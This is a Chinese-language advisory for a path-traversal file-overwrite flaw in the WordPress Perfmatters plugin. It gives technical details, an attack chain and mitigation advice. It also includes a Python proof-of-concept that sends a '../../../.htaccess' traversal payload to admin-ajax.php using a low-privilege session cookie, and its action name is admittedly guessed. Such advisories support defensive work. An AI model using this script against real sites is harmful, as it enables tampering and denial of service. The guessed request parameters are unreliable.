CVE-2026-4351: WordPress Perfmatters 任意文件覆盖漏洞

漏洞信息

漏洞编号

CVE-2026-4351

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Perfmatters Plugin

漏洞概述

WordPress Perfmatters插件在2.5.9及之前版本中存在高危安全漏洞。由于`PMCS::action_handler()`方法在处理代码片段的批量激活或停用时，缺乏必要的授权检查和Nonce验证，导致未经净化的用户输入被直接用于文件操作。经过身份验证的攻击者（仅需订阅者权限）可利用路径遍历技术覆盖服务器上的任意文件，写入固定的PHP文档块内容，可能破坏关键系统文件导致拒绝服务。

技术细节

该漏洞的核心在于插件对用户输入的处理不当以及权限校验的缺失。漏洞触发点位于`PMCS::action_handler()`方法，该方法负责处理代码片段的批量激活或停用操作。由于缺乏授权检查和Nonce验证，任何拥有登录凭证（即便是低权限的订阅者）的用户均可触发此流程。当攻击者构造包含恶意路径的`$_GET['snippets'][]`参数发送请求时，这些未经净化的数据会被直接传递给`Snippet::activate()`或`Snippet::deactivate()`，进而调用`Snippet::update()`。最终，程序使用`file_put_contents()`函数将固定的PHP文档块内容写入攻击者指定的路径。通过在参数中嵌入`../`序列，攻击者可利用路径遍历绕过目录限制，将服务器上的关键文件（如`index.php`、`.htaccess`）覆盖，导致网站瘫痪或拒绝服务。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个WordPress订阅者级别的账户。

STEP 2

2. 构造载荷

攻击者构造包含路径遍历字符（如'../'）的恶意参数，目标是覆盖关键文件（如.htaccess）。

STEP 3

3. 发送请求

攻击者使用携带的有效Session向`admin-ajax.php`发送包含恶意`snippets[]`参数的GET请求。

STEP 4

4. 漏洞触发

服务器端`PMCS::action_handler()`接收请求，跳过权限检查，直接调用`file_put_contents()`处理路径。

STEP 5

5. 文件覆盖

攻击者指定的文件被固定的PHP内容覆盖，导致网站功能异常或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4351
# This script demonstrates how an authenticated attacker can overwrite arbitrary files.
# Target: WordPress Perfmatters Plugin <= 2.5.9
import requests

def exploit(target, session_cookie, file_to_overwrite):
    """
    target: Base URL of the WordPress site
    session_cookie: Authenticated WordPress cookie (Subscriber level or higher)
    file_to_overwrite: Path to the file to overwrite (e.g., '../../../.htaccess')
    """
    # Constructing the URL to admin-ajax.php where the action is likely hooked
    url = f"{target}/wp-admin/admin-ajax.php"
    
    # Payload parameters based on vulnerability description
    # PMCS::action_handler() processes activate/deactivate without nonce check
    params = {
        'action': 'pmcs_snippets_action',  # Likely action name based on class PMCS context
        'dotype': 'activate',              # Triggering the activate handler
        'snippets[]': [file_to_overwrite]  # Path traversal payload in GET array
    }
    
    headers = {
        'Cookie': session_cookie
    }
    
    try:
        # Sending GET request as per $_GET usage in description
        response = requests.get(url, params=params, headers=headers)
        if response.status_code == 200:
            return f"Request sent successfully. Check if {file_to_overwrite} was overwritten."
        else:
            return f"Request failed with status code: {response.status_code}"
    except Exception as e:
        return str(e)

# Example Usage
# target_url = "http://localhost"
# user_cookie = "wordpress_logged_in_xxx=xxx"
# payload_path = "../../../.htaccess"
# print(exploit(target_url, user_cookie, payload_path))

影响范围

Perfmatters <= 2.5.9

防御指南

临时缓解措施

建议立即将 Perfmatters 插件更新到最新版本以修复此漏洞。如果无法立即更新，应暂时禁用该插件，并严格限制订阅者级别用户的登录权限，防止不可信用户获取账户。同时，管理员应定期检查服务器核心文件（如.htaccess, index.php）的完整性，一旦发现异常需及时恢复。